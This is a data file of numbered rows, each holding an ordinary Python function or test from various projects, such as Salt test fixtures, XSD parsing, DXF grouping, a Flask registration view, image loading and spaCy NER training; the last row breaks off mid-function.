content (string, lengths 22 to 815k)
id (int64, 0 to 4.91M)
def io_loop():
    """
    Create new io loop for each test, and tear it down after.
    """
    loop = salt.ext.tornado.ioloop.IOLoop()
    loop.make_current()
    try:
        yield loop
    finally:
        loop.clear_current()
        loop.close(all_fds=True)
5,348,600
def inverse_sphere_distances(batch, dist, labels, anchor_label):
    """
    Function to utilise the distances of batch samples to compute their probability of occurence,
    and using the inverse to sample actual negatives to the resp. anchor.

    Args:
        batch:        torch.Tensor(), batch for which the sampling probabilities w.r.t to the anchor are computed. Used only to extract the shape.
        dist:         torch.Tensor(), computed distances between anchor to all batch samples.
        labels:       np.ndarray, labels for each sample for which distances were computed in dist.
        anchor_label: float, anchor label
    Returns:
        distance_matrix, clamped to ensure no zero values are passed.
    """
    bs, dim = len(dist), batch.shape[-1]

    # negated log-distribution of distances of unit sphere in dimension <dim>
    log_q_d_inv = ((2.0 - float(dim)) * torch.log(dist)
                   - (float(dim - 3) / 2) * torch.log(1.0 - 0.25 * (dist.pow(2))))
    # Set sampling probabilities of positives to zero
    log_q_d_inv[np.where(labels == anchor_label)[0]] = 0

    q_d_inv = torch.exp(log_q_d_inv - torch.max(log_q_d_inv))  # - max(log) for stability
    # Set sampling probabilities of positives to zero
    q_d_inv[np.where(labels == anchor_label)[0]] = 0

    ### NOTE: Cutting of values with high distances made the results slightly worse.
    # q_d_inv[np.where(dist > upper_cutoff)[0]] = 0

    # Normalize inverted distance for probability distr.
    q_d_inv = q_d_inv / q_d_inv.sum()
    return q_d_inv.detach().cpu().numpy()
5,348,601
def add_module_path(folder):
    """Adds a new search path to the list of search paths."""
    import os
    __path__.append(os.path.abspath(folder))
5,348,602
def get_recording(sleeps=False):
    """Get list of recorded steps.

    :param sleeps: set False to exclude recording sleeps
    """
    # TODO. atm will always use CLICK
    # TODO. Add examples
    global recording  # pylint: disable=W0602
    output = []
    top = None
    action_name = "Click"
    for item in recording:
        if sleeps and item["type"] == "sleep":
            output.append(f"Sleep {item['value']}s")
        if (
            item["type"] == "locator"
            and not top
            or "top" in item.keys()
            and item["top"] != top
        ):
            output.append(
                f"Control Window {item['top']}  # Handle: {item['top_handle']}"
            )
            top = item["top"]
        if item["type"] == "locator":
            output.append(f"{action_name} {item['locator']}")

    result = "\n".join(output)
    header = (
        f"\n{'-'*80}"
        "\nCOPY & PASTE BELOW CODE INTO *** Tasks *** or *** Keywords ***"
        f"\n{'-'*80}\n\n"
    )
    footer = f"\n\n{'-'*80}"
    return f"{header}{result}{footer}"
5,348,603
def wrap_onspace(text, width):
    """
    A word-wrap function that preserves existing line breaks
    and most spaces in the text. Expects that existing line
    breaks are posix newlines (\n).
    """
    return reduce(lambda line, word, width=width: '%s%s%s' %
                  (line,
                   ' \n'[(len(line[line.rfind('\n')+1:])
                          + len(word.split('\n', 1)[0]) >= width)],
                   word),
                  text.split(' '))
5,348,604
def xsd_simple_type_factory(elem, schema, parent):
    """
    Factory function for XSD simple types. Parses the xs:simpleType element and its
    child component, that can be a restriction, a list or an union. Annotations are
    linked to simple type instance, omitting the inner annotation if both are given.
    """
    annotation = None
    try:
        child = elem[0]
    except IndexError:
        return schema.maps.types[XSD_ANY_SIMPLE_TYPE]
    else:
        if child.tag == XSD_ANNOTATION:
            annotation = XsdAnnotation(elem[0], schema, child)
            try:
                child = elem[1]
            except IndexError:
                schema.parse_error("(restriction | list | union) expected", elem)
                return schema.maps.types[XSD_ANY_SIMPLE_TYPE]

    if child.tag == XSD_RESTRICTION:
        xsd_type = schema.BUILDERS.restriction_class(child, schema, parent)
    elif child.tag == XSD_LIST:
        xsd_type = XsdList(child, schema, parent)
    elif child.tag == XSD_UNION:
        xsd_type = schema.BUILDERS.union_class(child, schema, parent)
    else:
        schema.parse_error("(restriction | list | union) expected", elem)
        return schema.maps.types[XSD_ANY_SIMPLE_TYPE]

    if annotation is not None:
        xsd_type.annotation = annotation

    try:
        xsd_type.name = get_qname(schema.target_namespace, elem.attrib['name'])
    except KeyError:
        if parent is None:
            schema.parse_error("missing attribute 'name' in a global simpleType", elem)
            xsd_type.name = 'nameless_%s' % str(id(xsd_type))
    else:
        if parent is not None:
            schema.parse_error("attribute 'name' not allowed for a local simpleType", elem)
            xsd_type.name = None

    if 'final' in elem.attrib:
        try:
            xsd_type._final = get_xsd_derivation_attribute(elem, 'final')
        except ValueError as err:
            xsd_type.parse_error(err, elem)

    return xsd_type
5,348,605
def test_add_user_to_group(onefs_client, created_user, created_group):
    """Ensure that a user can be added to a group successfully."""
    assert onefs_client.add_user_to_group(
        user_name=created_user[0],
        group_name=created_group[0],
    ) is None
5,348,606
def setup_logger(run_mode="training", log_level=10, console_logging=True): """ Call logger create module and setup the logger for current run params: run_mode - str - optional - Default - training params: log_level - int - optional - Default - 20 - INFO params: console_logging - Boolean - optional - Enable console logging - default True """ log_dir = os.path.abspath(os.path.join(os.path.dirname(MODULE_DIR), ".", "logs")) log_file_name = f"{run_mode}_{os.path.basename(__file__).split('.')[0]}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log" global logger # Creates a logger logger = create_logger( log_level, console_logging, log_dir=log_dir, log_file_name=log_file_name )
5,348,607
def amen_solve(A, f, x0, eps, kickrank=4, nswp=20, local_prec='n', local_iters=2, local_restart=40, trunc_norm=1, max_full_size=50, verb=1): """ Approximate linear system solution in the tensor-train (TT) format using Alternating minimal energy (AMEN approach) :References: Sergey Dolgov, Dmitry. Savostyanov Paper 1: http://arxiv.org/abs/1301.6068 Paper 2: http://arxiv.org/abs/1304.1222 :param A: Matrix in the TT-format :type A: matrix :param f: Right-hand side in the TT-format :type f: tensor :param x0: TT-tensor of initial guess. :type x0: tensor :param eps: Accuracy. :type eps: float :Example: >>> import tt >>> import tt.amen #Needed, not imported automatically >>> a = tt.qlaplace_dd([8, 8, 8]) #3D-Laplacian >>> rhs = tt.ones(2, 3 * 8) #Right-hand side of all ones >>> x = tt.amen.amen_solve(a, rhs, rhs, 1e-8) amen_solve: swp=1, max_dx= 9.766E-01, max_res= 3.269E+00, max_rank=5 amen_solve: swp=2, max_dx= 4.293E-01, max_res= 8.335E+00, max_rank=9 amen_solve: swp=3, max_dx= 1.135E-01, max_res= 5.341E+00, max_rank=13 amen_solve: swp=4, max_dx= 9.032E-03, max_res= 5.908E-01, max_rank=17 amen_solve: swp=5, max_dx= 9.500E-04, max_res= 7.636E-02, max_rank=21 amen_solve: swp=6, max_dx= 4.002E-05, max_res= 5.573E-03, max_rank=25 amen_solve: swp=7, max_dx= 4.949E-06, max_res= 8.418E-04, max_rank=29 amen_solve: swp=8, max_dx= 9.618E-07, max_res= 2.599E-04, max_rank=33 amen_solve: swp=9, max_dx= 2.792E-07, max_res= 6.336E-05, max_rank=37 amen_solve: swp=10, max_dx= 4.730E-08, max_res= 1.663E-05, max_rank=41 amen_solve: swp=11, max_dx= 1.508E-08, max_res= 5.463E-06, max_rank=45 amen_solve: swp=12, max_dx= 3.771E-09, max_res= 1.847E-06, max_rank=49 amen_solve: swp=13, max_dx= 7.797E-10, max_res= 6.203E-07, max_rank=53 amen_solve: swp=14, max_dx= 1.747E-10, max_res= 2.058E-07, max_rank=57 amen_solve: swp=15, max_dx= 8.150E-11, max_res= 8.555E-08, max_rank=61 amen_solve: swp=16, max_dx= 2.399E-11, max_res= 4.215E-08, max_rank=65 amen_solve: swp=17, max_dx= 7.871E-12, max_res= 1.341E-08, max_rank=69 amen_solve: swp=18, max_dx= 3.053E-12, max_res= 6.982E-09, max_rank=73 >>> print (tt.matvec(a, x) - rhs).norm() / rhs.norm() 5.5152374305127345e-09 """ m = A.m.copy() rx0 = x0.r.copy() psx0 = x0.ps.copy() if A.is_complex or f.is_complex: amen_f90.amen_f90.ztt_amen_wrapper(f.d, A.n, m, A.tt.r, A.tt.ps, A.tt.core, f.r, f.ps, f.core, rx0, psx0, x0.core, eps, kickrank, nswp, local_iters, local_restart, trunc_norm, max_full_size, verb, local_prec) else: if x0.is_complex: x0 = x0.real() rx0 = x0.r.copy() psx0 = x0.ps.copy() amen_f90.amen_f90.dtt_amen_wrapper(f.d, A.n, m, A.tt.r, A.tt.ps, A.tt.core, f.r, f.ps, f.core, rx0, psx0, x0.core, eps, kickrank, nswp, local_iters, local_restart, trunc_norm, max_full_size, verb, local_prec) x = tt.tensor() x.d = f.d x.n = m.copy() x.r = rx0 if A.is_complex or f.is_complex: x.core = amen_f90.amen_f90.zcore.copy() else: x.core = amen_f90.amen_f90.core.copy() amen_f90.amen_f90.deallocate_result() x.get_ps() return x
5,348,608
def get_vss(ts, tau_p):
    """ Compute candidates of VS for specified task tau_p """
    if tau_p is None:
        return []
    C, T, D = extract(ts)
    R = rta(C, T)
    _VS = _get_vs(C, T, R, task_name_to_index(ts, tau_p))
    _VS.sort()

    VS = []
    vs = Server(0, 0, None)
    # ignore duplicates
    for s in _VS:
        if vs.C == s[0] and vs.T == s[1]:
            continue
        vs = Server(s[0], s[1], tau_p)
        VS.append(vs)

    return VS
5,348,609
def groupby( entities: Iterable["DXFEntity"], dxfattrib: str = "", key: "KeyFunc" = None ) -> Dict[Hashable, List["DXFEntity"]]: """ Groups a sequence of DXF entities by a DXF attribute like ``'layer'``, returns a dict with `dxfattrib` values as key and a list of entities matching this `dxfattrib`. A `key` function can be used to combine some DXF attributes (e.g. layer and color) and should return a hashable data type like a tuple of strings, integers or floats, `key` function example:: def group_key(entity: DXFEntity): return entity.dxf.layer, entity.dxf.color For not suitable DXF entities return ``None`` to exclude this entity, in this case it's not required, because :func:`groupby` catches :class:`DXFAttributeError` exceptions to exclude entities, which do not provide layer and/or color attributes, automatically. Result dict for `dxfattrib` = ``'layer'`` may look like this:: { '0': [ ... list of entities ], 'ExampleLayer1': [ ... ], 'ExampleLayer2': [ ... ], ... } Result dict for `key` = `group_key`, which returns a ``(layer, color)`` tuple, may look like this:: { ('0', 1): [ ... list of entities ], ('0', 3): [ ... ], ('0', 7): [ ... ], ('ExampleLayer1', 1): [ ... ], ('ExampleLayer1', 2): [ ... ], ('ExampleLayer1', 5): [ ... ], ('ExampleLayer2', 7): [ ... ], ... } All entity containers (modelspace, paperspace layouts and blocks) and the :class:`~ezdxf.query.EntityQuery` object have a dedicated :meth:`groupby` method. Args: entities: sequence of DXF entities to group by a DXF attribute or a `key` function dxfattrib: grouping DXF attribute like ``'layer'`` key: key function, which accepts a :class:`DXFEntity` as argument and returns a hashable grouping key or ``None`` to ignore this entity """ if all((dxfattrib, key)): raise DXFValueError( "Specify a dxfattrib or a key function, but not both." ) if dxfattrib != "": key = lambda entity: entity.dxf.get_default(dxfattrib) if key is None: raise DXFValueError( "no valid argument found, specify a dxfattrib or a key function, " "but not both." ) result: Dict[Hashable, List["DXFEntity"]] = dict() for dxf_entity in entities: if not dxf_entity.is_alive: continue try: group_key = key(dxf_entity) except DXFAttributeError: # ignore DXF entities, which do not support all query attributes continue if group_key is not None: group = result.setdefault(group_key, []) group.append(dxf_entity) return result
5,348,610
def py_binary(name, srcs=[], deps=[], main=None, base=None, **kwargs):
    """python binary. """
    target = PythonBinary(name, srcs, deps, main, base, kwargs)
    build_manager.instance.register_target(target)
5,348,611
def train_test_split(data_filepath, num_train=10, num_test=10):
    """Split a dataset into training and test sets."""
    df = pd.read_csv(data_filepath, sep=',', header=None)
    data = df.values
    train = data[:2*num_train, :]
    test = data[2*num_train:2*(num_train+num_test), :]

    ind = np.argsort(train[:, -1])
    X_train = train[ind][:, :-1]
    y_train = train[ind][:, -1]

    ind = np.argsort(test[:, -1])
    X_test = test[ind][:, :-1]
    y_test = test[ind][:, -1]

    return X_train, y_train, X_test, y_test
5,348,612
def get_filings(app: Flask = None):
    """Get a filing with filing_id."""
    r = requests.get(f'{app.config["LEGAL_URL"]}/internal/filings')
    if not r or r.status_code != 200:
        app.logger.error(f'Failed to collect filings from legal-api. {r} {r.json()} {r.status_code}')
        raise Exception
    return r.json()
5,348,613
def _uno_struct__setattr__(self, name, value):
    """Sets attribute on UNO struct.

    Referenced from the pyuno shared library.
    """
    return setattr(self.__dict__["value"], name, value)
5,348,614
def load_imgs_from_tree(data_dir, img_sub_folder=None, fovs=None, channels=None, dtype="int16", variable_sizes=False): """Takes a set of imgs from a directory structure and loads them into an xarray. Args: data_dir (str): directory containing folders of images img_sub_folder (str): optional name of image sub-folder within each fov fovs (list): optional list of folders to load imgs from. Default loads all folders channels (list): optional list of imgs to load, otherwise loads all imgs dtype (str/type): dtype of array which will be used to store values variable_sizes (bool): if true, will pad loaded images with zeros to fit into array Returns: xarray.DataArray: xarray with shape [fovs, x_dim, y_dim, tifs] """ iou.validate_paths(data_dir, data_prefix=False) if fovs is None: # get all fovs fovs = iou.list_folders(data_dir) fovs.sort() if len(fovs) == 0: raise ValueError(f"No fovs found in directory, {data_dir}") if img_sub_folder is None: # no img_sub_folder, change to empty string to read directly from base folder img_sub_folder = "" # get imgs from first fov if no img names supplied if channels is None: channels = iou.list_files( path_join(data_dir, fovs[0], img_sub_folder), substrs=['.tif', '.jpg', '.png'] ) # if taking all channels from directory, sort them alphabetically channels.sort() # otherwise, fill channel names with correct file extension elif not all([img.endswith(("tif", "tiff", "jpg", "png")) for img in channels]): # need this to reorder channels back because list_files may mess up the ordering channels_no_delim = [img.split('.')[0] for img in channels] all_channels = iou.list_files( path_join(data_dir, fovs[0], img_sub_folder), substrs=channels_no_delim, exact_match=True ) # get the corresponding indices found in channels_no_delim channels_indices = [channels_no_delim.index(chan.split('.')[0]) for chan in all_channels] # reorder back to original channels = [chan for _, chan in sorted(zip(channels_indices, all_channels))] if len(channels) == 0: raise ValueError("No images found in designated folder") test_img = io.imread( path_join(data_dir, fovs[0], img_sub_folder, channels[0], get_filehandle=True) ) # check to make sure that float dtype was supplied if image data is float data_dtype = test_img.dtype if np.issubdtype(data_dtype, np.floating): if not np.issubdtype(dtype, np.floating): warnings.warn(f"The supplied non-float dtype {dtype} was overwritten to {data_dtype}, " f"because the loaded images are floats") dtype = data_dtype if variable_sizes: img_data = np.zeros((len(fovs), 1024, 1024, len(channels)), dtype=dtype) else: img_data = np.zeros((len(fovs), test_img.shape[0], test_img.shape[1], len(channels)), dtype=dtype) for fov in range(len(fovs)): for img in range(len(channels)): if variable_sizes: temp_img = io.imread( path_join(data_dir, fovs[fov], img_sub_folder, channels[img], get_filehandle=True) ) img_data[fov, :temp_img.shape[0], :temp_img.shape[1], img] = temp_img else: img_data[fov, :, :, img] = io.imread(path_join(data_dir, fovs[fov], img_sub_folder, channels[img], get_filehandle=True)) # check to make sure that dtype wasn't too small for range of data if np.min(img_data) < 0: raise ValueError("Integer overflow from loading TIF image, try a larger dtype") if variable_sizes: row_coords, col_coords = range(1024), range(1024) else: row_coords, col_coords = range(test_img.shape[0]), range(test_img.shape[1]) # remove .tif or .tiff from image name img_names = [os.path.splitext(img)[0] for img in channels] img_xr = xr.DataArray(img_data, coords=[fovs, row_coords, 
col_coords, img_names], dims=["fovs", "rows", "cols", "channels"]) return img_xr
5,348,615
def register():
    """Registers the user."""
    if g.user:
        return redirect(url_for('user_home'))
    error = None
    if request.method == 'POST':
        if not request.form['username']:
            error = 'You have to enter a username'
        elif not request.form['email'] or '@' not in request.form['email']:
            error = 'You have to enter a valid email address'
        elif not request.form['password']:
            error = 'You have to enter a password'
        elif request.form['password'] != request.form['password2']:
            error = 'The two passwords do not match'
        elif get_uid(request.form['username']) is not None:
            error = 'The username is already taken'
        else:
            db = get_db()
            db.execute('''insert into user (
                username, email, pw_hash, day, inc_log, dec_log, phase)
                values (?, ?, ?, 1, ?, ?, 1)''',
                [request.form['username'], request.form['email'],
                 generate_password_hash(request.form['password']),
                 datetime.datetime.utcnow(), datetime.datetime.utcnow()])
            db.commit()
            flash('You were successfully registered and can login now')
            return redirect(url_for('login'))
    return render_template('register.html', error=error)
5,348,616
def test_single_while_2():
    """
    Feature: JIT Fallback
    Description: Test fallback with control flow.
    Expectation: No exception.
    """
    @ms_function
    def control_flow_while():
        x = Tensor(7).astype("int32")
        y = Tensor(0).astype("int32")
        while x >= y:
            y += x
        return y

    res = control_flow_while()
    assert res == 14
5,348,617
def build_and_predict_model(ml_input_df):
    """
    Create a standardized feature matrix X and target array y.
    Returns the model and accuracy statistics
    """
    import cuml
    from cuml.metrics import confusion_matrix

    feature_names = ["college_education", "male"] + [
        "clicks_in_%d" % i for i in range(1, 8)
    ]
    X = ml_input_df[feature_names]
    # Standardize input matrix
    X = (X - X.mean()) / X.std()
    y = ml_input_df["clicks_in_category"]

    model = cuml.LogisticRegression(
        tol=convergence_tol,
        penalty="none",
        solver="qn",
        fit_intercept=True,
        max_iter=iterations,
        C=C,
    )
    model.fit(X, y)

    #
    # Predict and evaluate accuracy
    # (Should be 1.0) at SF-1
    #
    results_dict = {}
    y_pred = model.predict(X)

    results_dict["auc"] = roc_auc_score(y.to_array(), y_pred.to_array())
    results_dict["precision"] = cupy_precision_score(cp.asarray(y), cp.asarray(y_pred))
    results_dict["confusion_matrix"] = confusion_matrix(
        cp.asarray(y, dtype="int32"), cp.asarray(y_pred, dtype="int32")
    )
    results_dict["output_type"] = "supervised"
    return results_dict
5,348,618
def codes_new_from_file(fileobj, product_kind, headers_only=False):
    """
    @brief Load in memory a message from a file for a given product.

    The message can be accessed through its id and will be available\n
    until @ref grib_release is called.\n

    \b Examples: \ref get_product_kind.py "get_product_kind.py"

    @param fileobj       python file object
    @param product_kind  one of CODES_PRODUCT_GRIB, CODES_PRODUCT_BUFR, CODES_PRODUCT_GTS or CODES_PRODUCT_ANY
    @param headers_only  whether or not to load the message with the headers only
    @return              id of the message loaded in memory
    @exception GribInternalError
    """
    if product_kind == CODES_PRODUCT_GRIB:
        return grib_new_from_file(fileobj, headers_only)
    if product_kind == CODES_PRODUCT_BUFR:
        return bufr_new_from_file(fileobj, headers_only)
    if product_kind == CODES_PRODUCT_METAR:
        return metar_new_from_file(fileobj, headers_only)
    if product_kind == CODES_PRODUCT_GTS:
        return gts_new_from_file(fileobj, headers_only)
    if product_kind == CODES_PRODUCT_ANY:
        return any_new_from_file(fileobj, headers_only)
    raise Exception("Invalid product kind: " + product_kind)
5,348,619
def list_resources(path, long_format=None, relations=False): """List resources in a given DMF workspace. Args: path (str): Path to the workspace long_format (bool): List in long format flag relations (bool): Show relationships, in long format Returns: None """ t = ColorTerm() d = DMF(path) if long_format: resources = list(d.find()) uuid_pfx = _uuid_prefix([r.uuid for r in resources]) fields = ("uuid", "name", "type", "modified", "created") widths = (uuid_pfx, 30, 20, 19, 19) colors = (t.green, t.white, t.yellow, t.white, t.white) fmts = [f"{{:{w}s}}" for w in widths] left_gutter = "| " if relations else "" # table header print( " " * len(left_gutter) + t.bold + " ".join([f.format(v) for f, v in zip(fmts, fields)]) + t.reset ) def datestr(t): return datetime.isoformat(datetime.fromtimestamp(t)) # table body for r in resources: values = list(getattr(r, k) for k in fields[:-2]) values.append(datestr(r.modified)) values.append(datestr(r.created)) if not values[1] and r.desc: values[1] = r.desc[: widths[1]] else: values[1] = values[1][: widths[1]] if uuid_pfx < 32: values[0] = values[0][:uuid_pfx] print( left_gutter + " ".join([c + f.format(v) for c, f, v in zip(colors, fmts, values)]) + t.reset ) if relations and len(r.relations) > 0: relitems = [] for rel in r.relations: if rel.subject == r.uuid: fmt = f"{t.white}{{p}}->{t.blue}{{o}}" else: fmt = f"{t.blue}{{s}}->{t.white}{{p}}" item = fmt.format( s=rel.subject[:uuid_pfx], p=rel.predicate, o=rel.object[:uuid_pfx], ) relitems.append(item) print(f"+-- {' / '.join(relitems)}") else: items = [] for r in d.find(): name_color = "w" if r.name: name = r.name elif r.desc: name = r.desc[:40] name_color = t.blue else: name = r.uuid name_color = t.green item = f"{name_color}{name}{t.yellow}:{r.type}" items.append(item) if items: columnized = _display_in_columns(items, max_line=t.width) print(columnized + t.reset)
5,348,620
def calc_streamtemp(tas):
    """ Global standard regression equation from Punzet et al. (2012)
        Calculates grid cell stream temperature based on air temperature
        Both input and output temperature are in K"""
    # global constants, taken from Punzet et al., 2012
    c0 = 32; c1 = -0.13; c2 = 1.94
    tas_C = tas - 273.15
    streamtemp_C = c0 / (1 + np.exp(c1 * tas_C + c2))
    streamtemp = streamtemp_C + 273.15
    return streamtemp
5,348,621
def _process(proc_data):
    """
    Final processing to conform to the schema.

    Parameters:

        proc_data:   (List of Dictionaries) raw structured data to process

    Returns:

        List of Dictionaries. Structured data to conform to the schema.
    """
    # nothing more to process
    return proc_data
5,348,622
def _extractor_image_dependencies():
    """Defines external repositories necessary for extractor images."""
    go_repository(
        name = "com_github_bazelbuild_bazelisk",
        importpath = "github.com/bazelbuild/bazelisk",
        tag = "v1.3.0",
    )

    go_repository(
        name = "com_github_mitchellh_go_homedir",
        importpath = "github.com/mitchellh/go-homedir",
        tag = "v1.1.0",
    )

    go_repository(
        name = "com_github_hashicorp_go_version",
        importpath = "github.com/hashicorp/go-version",
        tag = "v1.1.0",
    )
5,348,623
def get_station_info(my_token, station_id):
    """
    This function gets all the information on the station
    ----------
    Input:
        my_token (str) token generated from "token request page"
        station_id (str)
    ----------
    Output:
        dictionary of station information
    """
    station_url = '{}stations/{}'.format(base_url, station_id)
    return requests.get(station_url, headers={'token': my_token}).json()
5,348,624
def start(task):
    """ Start cache and start the Stanford parser """
    startCache(task)
    startServer(task.stanfordParserConfig())
5,348,625
def test_salt_cp(master, minion, salt_cp, tempfiles): """ Test copying a file from the master to the minion """ tfile = tempfile.NamedTemporaryFile(delete=True) tfile.close() dest = tfile.name try: contents = "id: foo" sls = tempfiles.makeslsfile(contents) assert master.is_alive() assert minion.is_alive() ret = salt_cp.run("minion-1", sls, dest) assert ret.exitcode == 0, ret assert ret.json == {"minion-1": {dest: True}}, ret assert os.path.exists(dest) with open(dest) as rfh: assert rfh.read() == contents finally: if os.path.exists(dest): os.unlink(dest) tfile = tempfile.NamedTemporaryFile(delete=True) tfile.close() dest = tfile.name try: contents = "id: foo" sls = tempfiles.makeslsfile(contents) assert master.is_alive() assert minion.is_alive() ret = salt_cp.run(sls, dest, minion_tgt="minion-1") assert ret.exitcode == 0, ret assert ret.json == {dest: True}, ret assert os.path.exists(dest) with open(dest) as rfh: assert rfh.read() == contents finally: if os.path.exists(dest): os.unlink(dest)
5,348,626
def json_response(f, *args, **kwargs):
    """Wrap a view in JSON.

    This decorator runs the given function and looks out for ajax.AJAXError's,
    which it encodes into a proper HttpResponse object. If an unknown error
    is thrown it's encoded as a 500.

    All errors are then packaged up with an appropriate Content-Type and a JSON
    body that you can inspect in JavaScript on the client. They look like:

    {
        "message": "Error message here.",
        "code": 500
    }

    Please keep in mind that raw exception messages could very well be exposed
    to the client if a non-AJAXError is thrown.
    """
    try:
        result = f(*args, **kwargs)
    except AJAXError, e:
        result = e.get_response()
    except Exception, e:
        import sys
        type, message, trace = sys.exc_info()
        if settings.DEBUG:
            import traceback
            tb = [{'file': l[0], 'line': l[1], 'in': l[2], 'code': l[3]}
                  for l in traceback.extract_tb(trace)]
            result = AJAXError(500, message, traceback=tb).get_response()
        else:
            result = AJAXError(500, message).get_response()

    result['Content-Type'] = 'application/json'
    return result
5,348,627
def tests_pyenv(session: nox_poetry.Session):
    """
    Runs pytest with coverage on the latest patch of each available pyenv
    minor python version at least 3.7.
    """
    _run_tests(session)
5,348,628
def check_fit_input(coordinates, data, weights, unpack=True): """ Validate the inputs to the fit method of gridders. Checks that the coordinates, data, and weights (if given) all have the same shape. Weights arrays are raveled. Parameters ---------- coordinates : tuple of arrays Arrays with the coordinates of each data point. Should be in the following order: (easting, northing, vertical, ...). data : array or tuple of arrays The data values of each data point. Data can have more than one component. In such cases, data should be a tuple of arrays. weights : None or array If not None, then the weights assigned to each data point. Typically, this should be 1 over the data uncertainty squared. If the data has multiple components, the weights have the same number of components. unpack : bool If False, data and weights will be tuples always. If they are single arrays, then they will be returned as a 1-element tuple. If True, will unpack the tuples if there is only 1 array in each. Returns ------- validated_inputs The validated inputs in the same order. If weights are given, will ravel the array before returning. """ data = check_data(data) weights = check_data(weights) coordinates = check_coordinates(coordinates) if any(i.shape != coordinates[0].shape for i in data): raise ValueError( "Data arrays must have the same shape {} as coordinates. Data shapes: {}.".format( coordinates[0].shape, [i.shape for i in data] ) ) if any(w is not None for w in weights): if len(weights) != len(data): raise ValueError( "Number of data '{}' and weights '{}' must be equal.".format( len(data), len(weights) ) ) if any(i.size != j.size for i in weights for j in data): raise ValueError("Weights must have the same size as the data array.") weights = tuple(i.ravel() for i in weights) else: weights = tuple([None] * len(data)) if unpack: if len(weights) == 1: weights = weights[0] if len(data) == 1: data = data[0] return coordinates, data, weights
5,348,629
def main():
    """
    Main
    :return: void
    """
    a = ProbabilityTable({"Werewolf": 3, "Possessed": 1, "Villager": 8,
                          "Bodyguard": 1, "Medium": 1, "Seer": 1},
                         ["Player1", "Player2", "Player3", "Player4", "Player5",
                          "Player6", "Player7", "Player8", "Player9", "Player10",
                          "Player11", "Player12", "Player13", "Player14", "Player15"],
                         ["Werewolf", "Possessed", "Villager", "Bodyguard", "Medium", "Seer"])
    # a.verify()
    for i in range(15):
        for j in range(6):
            t = a.table[i, j]
            a.add(i, j, -.1)
            print(a.table[i, j] - t)
    # a.add(4, 4, .9)
    # a.display()
    # a.verify()
5,348,630
def _sigint_handler(sig, frame):
    """Signal handler for ^C."""
    global polite_stop
    if not polite_stop:
        print('Stop requested. Regression will stop safely at next iteration. '
              'Press ^C again to force quit.')
        polite_stop = True
    else:
        print('Force quitting now.')
        exit()
5,348,631
def get_logger(name, handler=logging.StreamHandler(sys.stderr), level=logging.DEBUG):
    """
    encapsulate get logger operation
    :param name: logger name
    :param handler: logger handler, default is stderr
    :param level: logger level, default is debug
    :return: logger
    """
    logger = logging.getLogger(name)
    handler.setFormatter(logging.Formatter('[%(asctime)s] [{}] %(message)s'.format(name)))
    logger.addHandler(handler)
    logger.setLevel(level)
    return logger
5,348,632
def update_params(layers, param_grads, learning_rate):
    """
    Function to update the parameters of the given layers with the given gradients
    by gradient descent with the given learning rate.
    """
    for layer, layer_backprop_grads in zip(layers, param_grads):
        for param, grad in zip(layer.get_params_iter(), layer_backprop_grads):
            # The parameter returned by the iterator point to the memory space of
            # the original layer and can thus be modified inplace.
            param -= learning_rate * grad  # Update each parameter
5,348,633
def get_local_beneficiaries(map_lat: float, map_lng: float, map_zoom: int) -> DataFrame:
    """Return only projects that are fairly close to the map's centre."""
    return beneficiaries[
        (map_lat - 100 / map_zoom < beneficiaries.lat)
        & (beneficiaries.lat < map_lat + 100 / map_zoom)
        & (map_lng - 100 / map_zoom < beneficiaries.lng)
        & (beneficiaries.lng < map_lng + 100 / map_zoom)
    ][:500]
5,348,634
def parse_args(args):
    """
    Parse command line parameters

    :param args: command line parameters as list of strings
    :return: command line parameters as :obj:`argparse.Namespace`
    """
    parser = argparse.ArgumentParser(
        description="Build html reveal.js slides from markdown in docs/ dir")
    parser.add_argument(
        '-v', '--verbose',
        help='Whether to show progress messages on stdout, including HTML',
        action='store_true')
    parser.add_argument(
        '--version',
        help='print twip package version and exit.',
        action='version',
        version='twip {ver}'.format(ver=__version__))
    parser.add_argument(
        '-b', '--blog_path',
        help='Path to source markdown files. Must contain an `images` subdir',
        default=BLOG_PATH)
    parser.add_argument(
        '-s', '--slide_path',
        help='Path to dir for output slides (HTML). An images subdir will be added. A slides subdir should already exist.',
        default=DOCS_PATH)
    parser.add_argument(
        '-p', '--presentation',
        help='Source markdown base file name (without .md extension). The HTML slides will share the same basename.',
        default='2015-10-27-Hacking-Oregon-Hidden-Political-Connections')
    return parser.parse_args(args)
5,348,635
def main(model=None, new_model_name="imasc", output_dir="IMaSC", n_iter=10): """Set up the pipeline and entity recognizer, and train the new entity.""" random.seed(0) if model is not None: nlp = spacy.load(model) # load existing spaCy model print("Loaded model '%s'" % model) else: nlp = spacy.blank("en") # create blank Language class print("Created blank 'en' model") # Add entity recognizer to model if it's not in the pipeline # nlp.create_pipe works for built-ins that are registered with spaCy if "ner" not in nlp.pipe_names: ner = nlp.create_pipe("ner") nlp.add_pipe(ner) # otherwise, get it, so we can add labels to it else: ner = nlp.get_pipe("ner") for label in LABEL: ner.add_label(label) # add new entity label to entity recognizer if model is None: optimizer = nlp.begin_training() else: optimizer = nlp.resume_training() move_names = list(ner.move_names) # get names of other pipes to disable them during training pipe_exceptions = ["ner", "trf_wordpiecer", "trf_tok2vec"] other_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions] # only train NER with nlp.disable_pipes(*other_pipes) and warnings.catch_warnings(): # show warnings for misaligned entity spans once warnings.filterwarnings("once", category=UserWarning, module='spacy') sizes = compounding(1.0, 4.0, 1.001) # batch up the examples using spaCy's minibatch for itn in range(n_iter): random.shuffle(TRAIN_DATA) # Need some oversampling somewhere in here batches = minibatch(TRAIN_DATA, size=sizes) losses = {} for batch in batches: texts, annotations = zip(*batch) nlp.update(texts, annotations, sgd=optimizer, drop=0.35, losses=losses) #print("Losses", losses) # test the trained model test_text = "We will show with scatter diagrams of water vapor and ozone mixing ratios from the balloon soundings that there are signicant seasonal differences in the contributions from wave, source, and path variability. We augment the analysis by comparing the variance in the balloon soundings to simulated proles constructed from water vapor and ozone data from the Aura Microwave Limb Sounder (MLS) using a new reverse domain lling technique." doc = nlp(test_text) print("Entities in '%s'" % test_text) for ent in doc.ents: print(ent.label_, ent.text) # save model to output directory if output_dir is not None: output_dir = Path(output_dir) if not output_dir.exists(): output_dir.mkdir() nlp.meta["name"] = new_model_name # rename model nlp.to_disk(output_dir) print("Saved model to", output_dir) # test the saved model print("Loading from", output_dir) nlp2 = spacy.load(output_dir) # Check the classes have loaded back consistently assert nlp2.get_pipe("ner").move_names == move_names doc2 = nlp2(test_text) for ent in doc2.ents: 